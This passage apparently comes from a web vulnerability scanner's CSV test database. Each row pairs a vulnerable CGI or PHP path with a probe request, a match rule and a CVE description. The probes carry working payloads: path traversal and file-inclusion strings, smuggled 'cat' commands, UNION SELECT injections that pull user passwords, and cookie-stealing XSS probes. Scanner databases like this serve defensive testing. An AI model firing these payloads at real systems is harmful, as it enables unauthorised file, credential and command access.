files.\",\"\",\"\"\n\"000588\",\"\",\"5\",\"@CGIDIRScommon.php?f=0&ForumLang=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read files on the host.\",\"\",\"\"\n\"000589\",\"\",\"5\",\"@CGIDIRScommerce.cgi?page=@LFI()%00index.html\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000590\",\"\",\"5\",\"@CGIDIRScgiforum.pl?thesection=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000591\",\"\",\"5\",\"@CGIDIRScal_make.pl?p0=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000592\",\"\",\"5\",\"@CGIDIRSdb4web_c/dbdirname/@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"The hosts file was retrieved by using the db4web executable.\",\"\",\"\"\n\"000593\",\"CVE-2001-0780\",\"5\",\"@CGIDIRSdirectorypro.cgi?want=showcat&show=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the server.\",\"\",\"\"\n\"000594\",\"CVE-2002-0531\",\"5\",\"@CGIDIRSemumail/emumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000595\",\"CVE-2002-0531\",\"5\",\"@CGIDIRSemumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000596\",\"CVE-2002-0531\",\"5\",\"@CGIDIRSemu/html/emumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000597\",\"\",\"5\",\"@CGIDIRSfaxsurvey?cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"This CGI allows attackers to execute commands and read files remotely.\",\"\",\"\"\n\"000598\",\"CVE-2002-2033\",\"5\",\"@CGIDIRSfaqmanager.cgi?toc=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version.\",\"\",\"\"\n\"000599\",\"CVE-2000-0188\",\"5\",\"@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=@LFI()&distinct=1\",\"GET\",\"@LFI()\",\"EZShopper search CGI allows arbitrary files to be read\",\"\",\"\"\n\"000600\",\"\",\"5\",\"@CGIDIRSformmail?recipient=root@localhost%0Acat%20@LFI(abs)&email=joeuser@localhost&subject=test\",\"GET\",\"@LFI()\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"000601\",\"\",\"5\",\"@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20@LFI(abs)&email=joeuser@localhost&subject=test\",\"GET\",\"@LFI()\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"000603\",\"CVE-2001-1115\",\"5\",\"@CGIDIRSgenerate.cgi?content=../../../../../../../../../../Windows/win.ini%00board=board_1\",\"GET\",\"@LFI()\",\"This CGI from SIX webboard allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"000604\",\"CVE-2001-1115\",\"5\",\"@CGIDIRSgenerate.cgi?content=@LFI()%00board=board_1\",\"GET\",\"@LFI()\",\"This CGI from SIX webboard allows attackers read arbitrary files on the host.\",\"\",\"\"\n\"000605\",\"\",\"5\",\"@CGIDIRShtmlscript?@LFI()\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000606\",\"\",\"5\",\"@CGIDIRShtgrep?file=index.html&hdr=@LFI()\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000607\",\"\",\"5\",\"@CGIDIRShsx.cgi?show=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000608\",\"\",\"5\",\"@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+@LFI(abs)\",\"GET\",\"@LFI()\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"000609\",\"CVE-2003-0756\",\"5\",\"@CGIDIRSsbcgi/sitebuilder.cgi\",\"GET\",\"CODE:200\",\"SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: /<CGIDIR>/sbcgi/sitebuilder.cgi?username=<user>&password=<password>&selectedpage=../../../../../../../../../../etc/hosts\",\"\",\"\"\n\"000610\",\"\",\"5\",\"@CGIDIRSmrtg.cgi?cfg=@LFI()\",\"GET\",\"@LFI()\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000611\",\"\",\"5\",\"@CGIDIRSmrtg.cfg?cfg=@LFI()\",\"GET\",\"@LFI()\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000612\",\"\",\"5\",\"@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000613\",\"CVE-2002-1581\",\"5\",\"@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=@LFI()%00\",\"GET\",\"@LFI()\",\"MailReader.com v2.3.31 web package allows remote users to retrieve any system file.\",\"\",\"\"\n\"000614\",\"CVE-2002-0531\",\"5\",\"@CGIDIRSmail/emumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000615\",\"\",\"5\",\"@CGIDIRSloadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000616\",\"\",\"5\",\"@CGIDIRSloadpage.cgi?user_id=1&file=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000617\",\"CVE-2000-0208\",\"5\",\"@CGIDIRShtsearch?exclude=%60+@LFI(abs,nix)%60\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000618\",\"\",\"5\",\"@CGIDIRSshop.cgi?page=@LFI()\",\"GET\",\"@LFI()\",\"Remote file read retrieval.\",\"\",\"\"\n\"000619\",\"\",\"5\",\"@CGIDIRSsendtemp.pl?templ=@LFI()\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000620\",\"\",\"5\",\"@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\",\"GET\",\"BODY:resolv\\.conf\",\"It is possible to read files on the remote server, this CGI should be removed.\",\"\",\"\"\n\"000621\",\"CVE-2001-0215\",\"5\",\"@CGIDIRSsearch.pl?form=@LFI()%00\",\"GET\",\"@LFI()\",\"The ROADS search.pl allows attackers to retrieve system files.\",\"\",\"\"\n\"000622\",\"\",\"5\",\"@CGIDIRSsearch.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000623\",\"\",\"5\",\"@CGIDIRSsearch.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\",\"GET\",\"@LFI()\",\"This CGI contains a well known vuln that allows attackers to read any system file.\",\"\",\"\"\n\"000624\",\"\",\"5\",\"@CGIDIRSquickstore.cgi?page=@LFI()%00html&cart_id=\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the remote system.\",\"\",\"\"\n\"000625\",\"\",\"5\",\"@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20@LFI(abs)|&output_number=10\",\"GET\",\"@LFI()\",\"AHG's search.cgi allows any command to be executed. www.ahg.com.\",\"\",\"\"\n\"000626\",\"\",\"5\",\"@CGIDIRSphp.cgi?@LFI(abs)\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"000627\",\"\",\"5\",\"@CGIDIRSpals-cgi?palsAction=restart&documentName=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows remote users to read system files.\",\"\",\"\"\n\"000628\",\"\",\"5\",\"@CGIDIRSopendir.php?@LFI(abs)\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read any file on the web server.\",\"\",\"\"\n\"000629\",\"CVE-2002-0531\",\"5\",\"@CGIDIRSnph-emumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000630\",\"CVE-2001-0231\",\"5\",\"@CGIDIRSnewsdesk.cgi?t=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000631\",\"CVE-2000-0782\",\"5\",\"@CGIDIRSnetauth.cgi?cmd=show&page=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000632\",\"CVE-2000-0912,http://www.packetstormsecurity.org/0009-exploits/multihtml.c\",\"5\",\"@CGIDIRSmultihtml.pl?multi=@LFI(abs,nix)%00html\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned.\",\"\",\"\"\n\"000633\",\"CVE-1999-0039\",\"5\",\"@CGIDIRSwebdist.cgi?distloc=;cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read files remotely.\",\"\",\"\"\n\"000634\",\"CVE-2001-0214\",\"5\",\"@CGIDIRSway-board/way-board.cgi?db=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"Allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000635\",\"CVE-2001-0214\",\"5\",\"@CGIDIRSway-board.cgi?db=@LFI(abs)%00\",\"GET\",\"@LFI()\",\"Allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000637\",\"\",\"5\",\"@CGIDIRSviewsource?@LFI(abs)\",\"GET\",\"@LFI()\",\"Allows attacker to retrieve arbitrary files. Remove from CGI directory.\",\"\",\"\"\n\"000638\",\"\",\"5\",\"@CGIDIRSttawebtop.cgi/?action=start&pg=@LFI()\",\"GET\",\"@LFI()\",\"Tarantell TTAWeb Top CGI lets remote users read arbitrary files.\",\"\",\"\"\n\"000639\",\"\",\"5\",\"@CGIDIRStraffic.cgi?cfg=@LFI()\",\"GET\",\"@LFI()\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000640\",\"\",\"5\",\"@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000641\",\"CVE-2001-0420\",\"5\",\"@CGIDIRStalkback.cgi?article=@LFI()%00&action=view&matchview=1\",\"GET\",\"@LFI()\",\"Talkback CGI displays arbitrary files\",\"\",\"\"\n\"000642\",\"CVE-2001-0804\",\"5\",\"@CGIDIRSstory/story.pl?next=@LFI()%00\",\"GET\",\"@LFI()\",\"story.pl versions older than 1.4 allow any file to be read remotely.\",\"\",\"\"\n\"000643\",\"CVE-2001-0804\",\"5\",\"@CGIDIRSstory.pl?next=@LFI()%00\",\"GET\",\"@LFI()\",\"story.pl versions older than 1.4 allow any file to be read remotely.\",\"\",\"\"\n\"000644\",\"\",\"5\",\"@CGIDIRSstore/index.cgi?page=@LFI()\",\"GET\",\"@LFI()\",\"CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.\",\"\",\"\"\n\"000645\",\"\",\"5\",\"@CGIDIRSstore.cgi?StartID=@LFI()%00.html\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000646\",\"\",\"5\",\"@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e@LFI(abs,nix)\",\"GET\",\"@LFI()\",\"The server install allows reading of any system file by sending encoded '../' directives.\",\"\",\"\"\n\"000647\",\"CVE-2000-0180\",\"5\",\"@CGIDIRSsojourn.cgi?cat=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files.\",\"\",\"\"\n\"000648\",\"\",\"5\",\"@CGIDIRSsimple/view_page?mv_arg=|cat%20@LFI(abs)|\",\"GET\",\"@LFI()\",\"This CGI allows attackers to execute commands on the host as the HTTP daemon owner.\",\"\",\"\"\n\"000649\",\"CVE-2000-0922\",\"5\",\"@CGIDIRSshopper.cgi?newpage=@LFI()\",\"GET\",\"@LFI()\",\"Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.\",\"\",\"\"\n\"000650\",\"CVE-2001-1458\",\"5\",\"/servlet/webacc?User.html=@LFI()%00\",\"GET\",\"@LFI()\",\"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000651\",\"\",\"5\",\"/webcalendar/forum.php?user_inc=@LFI()\",\"GET\",\"@LFI()\",\"Webcalendar 0.9.41 and below allow remote users to read arbitrary files.\",\"\",\"\"\n\"000652\",\"https://vulners.com/osvdb/OSVDB:15392\",\"5\",\"/logbook.pl?file=../../../../../../../bin/cat%20@LFI(abs)%00|\",\"GET\",\"@LFI()\",\"Wordit Limited 2000 allows command execution.\",\"\",\"\"\n\"000653\",\"\",\"5\",\"@CGIDIRSsawmill5?rfcf+%22@LFI(abs)%22+spbn+1,1,21,1,1,1,1\",\"GET\",\"@LFI()\",\"Remote file retrieval.\",\"\",\"\"\n\"000654\",\"\",\"5\",\"/page.cgi?@LFI()\",\"GET\",\"@LFI()\",\"WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.\",\"\",\"\"\n\"000655\",\"\",\"5\",\"/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2F@LFI(abs)\",\"GET\",\"@LFI()\",\"EditTag allows arbitrary file retrieval.\",\"\",\"\"\n\"000656\",\"CVE-2001-1408\",\"5\",\"/base/webmail/readmsg.php?mailbox=@LFI()&id=1\",\"GET\",\"@LFI()\",\"Remote file retrieval.\",\"\",\"\"\n\"000659\",\"CVE-2001-1209\",\"5\",\"@CGIDIRSzml.cgi?file=@LFI()%00\",\"GET\",\"@LFI()\",\"Ztreet Markup Language interpreter allows arbitrary files to be read remotely.\",\"\",\"\"\n\"000660\",\"\",\"5\",\"@CGIDIRSYaBB.pl?board=news&action=display&num=@LFI()%00\",\"GET\",\"@LFI()\",\"This CGI lets users read any file with http daemon's permissions. Upgrade to latest version\",\"\",\"\"\n\"000661\",\"CVE-1999-1063\",\"5\",\"@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"Allows attacker to view any file (and possibly execute commands). Upgrade to latest version\",\"\",\"\"\n\"000662\",\"\",\"5\",\"@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"The whois.cgi allows any command to be executed on the system.\",\"\",\"\"\n\"000663\",\"\",\"5\",\"@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"The whois.cgi allows any command to be executed on the system.\",\"\",\"\"\n\"000664\",\"CVE-2001-0211\",\"5\",\"@CGIDIRSwebspirs.cgi?sp.nextform=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files.\",\"\",\"\"\n\"000665\",\"\",\"5\",\"@CGIDIRSwebplus?script=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to retrieve files remotely.\",\"\",\"\"\n\"000666\",\"\",\"5\",\"@CGIDIRSwebmail/html/emumail.cgi?type=/@LFI()%00\",\"GET\",\"@LFI()\",\"EmuMail allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000667\",\"CVE-2004-1782\",\"8\",\"/athenareg.php?pass=%20;cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"Athena web registration remote command execution.\",\"\",\"\"\n\"000668\",\"CVE-2000-1196\",\"7\",\"/PSUser/PSCOErrPage.htm?errPagePath=@LFI()\",\"GET\",\"@LFI()\",\"This default Netscape file allows an attacker to read arbitrary files on the host.\",\"\",\"\"\n\"000669\",\"\",\"5\",\"/search?NS-query-pat=@LFI()\",\"GET\",\"@LFI()\",\"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+\",\"\",\"\"\n\"000670\",\"\",\"5\",\"/search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini\",\"GET\",\"@LFI()\",\"The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+\",\"\",\"\"\n\"000671\",\"\",\"7\",\"/..\\..\\..\\..\\..\\..\\temp\\temp.class\",\"GET\",\"CODE:200\",\"Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.\",\"\",\"\"\n\"000672\",\"\",\"7\",\"@LFI(nix)\",\"GET\",\"@LFI()\",\"It is possible to read arbitrary files on the server by starting the path with a ../ traversal.\",\"\",\"\"\n\"000673\",\"\",\"7\",\"/.../.../.../.../.../.../.../.../...@LFI(win,abs)\",\"GET\",\"@LFI()\",\"Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?\",\"\",\"\"\n\"000674\",\"\",\"7\",\"/..................@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"The web server allows the password file to be retrieved.\",\"\",\"\"\n\"000675\",\"\",\"3\",\"/%3f.jsp\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.\",\"\",\"\"\n\"000677\",\"CVE-2000-0664\",\"7\",\"/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini\",\"GET\",\"@LFI()\",\"Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.\",\"\",\"\"\n\"000678\",\"\",\"7\",\"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e@LFI(abs)\",\"GET\",\"@LFI()\",\"Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).\",\"\",\"\"\n\"000679\",\"\",\"3\",\"/%00\",\"GET\",\"BODY:File Name\",\"Appending /%00 to a request to the web server may reveal a directory listing.\",\"\",\"\"\n\"000680\",\"\",\"7\",\"/ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini\",\"GET\",\"@LFI()\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000681\",\"\",\"7\",\"/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\hosts\",\"GET\",\"@LFI()\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000682\",\"\",\"7\",\"/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini\",\"GET\",\"@LFI()\",\"It is possible to read files on the server by adding through directory traversal by adding multiple /\\\\.. in front of file name.\",\"\",\"\"\n\"000683\",\"CVE-2002-0308\",\"9\",\"/admentor/adminadmin.asp\",\"GET\",\"CODE:200\",\"Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =\",\"\",\"\"\n\"000684\",\"CVE-2006-6795\",\"9\",\"@NUKEMy_eGallery/public/displayCategory.php\",\"GET\",\"CODE:200\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.\",\"\",\"\"\n\"000685\",\"\",\"9\",\"@CGIDIRSclassifieds/index.cgi\",\"GET\",\"CODE:200\",\"My Classifieds pre 2.12 is vulnerable to SQL injection attacks.\",\"\",\"\"\n\"000686\",\"CVE-2003-0025\",\"9\",\"/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x\",\"GET\",\"BODY:parse error\",\"IMP 2.x allows SQL injection, and reveals system information.\",\"\",\"\"\n\"000687\",\"CVE-2002-0216\",\"9\",\"/userinfo.php?uid=1;\",\"GET\",\"BODY:Query\\sError:\",\"Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.\",\"\",\"\"\n\"000688\",\"\",\"9\",\"/site/'%20UNION%20ALL%20SELECT%20FileToClob('@LFI(nix,abs)','server')::html,0%20FROM%20sysusers%20WHERE%20username=USER%20\\-\\-\\/\\.html\",\"GET\",\"@LFI()\",\"IBM Informix Web DataBlade allows remote execution of SQL\",\"\",\"\"\n\"000689\",\"\",\"9\",\"/site/'%20UNION%20ALL%20SELECT%20FileToClob('@LFI(nix,abs)','server')::html,0%20FROM%20sysusers%20WHERE%20username%20=%20USER%20\\-\\-\\/\\.html\",\"GET\",\"@LFI()\",\"Web DataBlade 4.12/Informix is vulnerable to SQL injection.\",\"\",\"\"\n\"000690\",\"\",\"9\",\"/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"BODY:<r0x>\\(\\.\\+\\?\\)<r0x>\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.\",\"\",\"\"\n\"000691\",\"\",\"9\",\"/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"BODY:<r0x>\\(\\.\\+\\?\\)<r0x>\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.\",\"\",\"\"\n\"000692\",\"\",\"8\",\"@CGIDIRSalibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"000693\",\"\",\"9\",\"/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=\",\"GET\",\"BODY:DB Error: syntax error\",\"phpWebSite 0.9.x and below are vulnerable to SQL injection.\",\"\",\"\"\n\"000694\",\"CVE-2003-1216\",\"9\",\"/phpBB2/search.php?search_id=1\\\\\",\"GET\",\"BODY:SQL Error\",\"phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.\",\"\",\"\"\n\"000695\",\"\",\"9\",\"/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"BODY:<r0x>\\(\\.\\+\\?\\)<r0x>\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.\",\"\",\"\"\n\"000696\",\"CVE-2002-1499\",\"9\",\"/author.asp\",\"GET\",\"CODE:200\",\"May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.\",\"\",\"\"\n\"000697\",\"CVE-2004-0584\",\"4\",\"/horde/test.php\",\"GET\",\"BODY:IMP: 3\\.\\(0\\|1\\|2\\|2\\.1\\)\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000698\",\"CVE-2004-0584\",\"4\",\"/imp/horde/test.php\",\"GET\",\"BODY:IMP: 3\\.\\(0\\|1\\|2\\|2\\.1\\)\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000699\",\"CVE-2004-0584\",\"4\",\"@CGIDIRShorde/test.php\",\"GET\",\"BODY:IMP: 3\\.\\(0\\|1\\|2\\|2\\.1\\)\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000700\",\"https://seclists.org/fulldisclosure/2003/Jun/494\",\"4\",\"/examples/cookie\",\"GET\",\"BODY:Cookie servlet\",\"JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.\",\"\",\"\"\n\"000701\",\"https://seclists.org/fulldisclosure/2003/Jun/494\",\"4\",\"/examples/session\",\"GET\",\"BODY:Session servlet\",\"JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.\",\"\",\"\"\n\"000702\",\"CVE-2003-1204\",\"4\",\"/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000703\",\"\",\"4\",\"/index.php?option=search&searchword=<script>alert(document.cookie);</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\);<\\/script>\",\"Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000704\",\"CVE-2003-1204\",\"4\",\"/emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000705\",\"CVE-2003-1204\",\"4\",\"/emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000706\",\"CVE-2003-1204\",\"4\",\"/emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000707\",\"\",\"4\",\"/administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000708\",\"CVE-2003-1204\",\"4\",\"/administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000709\",\"CVE-2003-1204\",\"4\",\"/administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000710\",\"CVE-2003-1204\",\"4\",\"/administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000711\",\"CVE-2003-1204\",\"4\",\"/administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000712\",\"CVE-2003-1204\",\"4\",\"/administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"000713\",\"https://vulners.com/osvdb/OSVDB:2820\",\"4\",\"/index.php?dir=<script>alert\\('Vulnerable'\\)<\\/script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.\",\"\",\"\"\n\"000714\",\"\",\"4\",\"/https-admserv/bin/index?/<script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Sun ONE Web Server 6.1 administration control is vulnerable to XSS 